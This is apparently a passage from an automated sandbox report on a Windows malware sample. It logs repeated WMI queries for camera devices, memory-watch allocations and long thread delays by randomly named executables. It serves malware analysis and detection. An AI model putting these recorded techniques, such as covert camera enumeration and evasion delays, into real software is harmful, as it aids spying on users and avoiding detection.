                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1740000 memory reserve | memory write watchJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1B480000 memory reserve | memory write watchJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1580000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1B350000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: E00000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1A870000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 14E0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1B1D0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: FE0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1AC40000 memory reserve | memory write watch
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: CA0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1A750000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 650000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1A3F0000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1430000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1AFC0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1450000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1B190000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 9E0000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 29B0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1A9F0000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1440000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1B090000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 600000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599868
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599734
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599625
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599484
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599304
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599178
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 3600000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598609
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598426
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598297
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598185
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598077
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597968
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597858
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597749
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597639
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597515
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597297
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597109
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596701
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596593
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596483
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596369
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596240
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596125
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595905
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595796
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595685
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595576
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595468
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595359
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595249
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595140
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594656
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594261
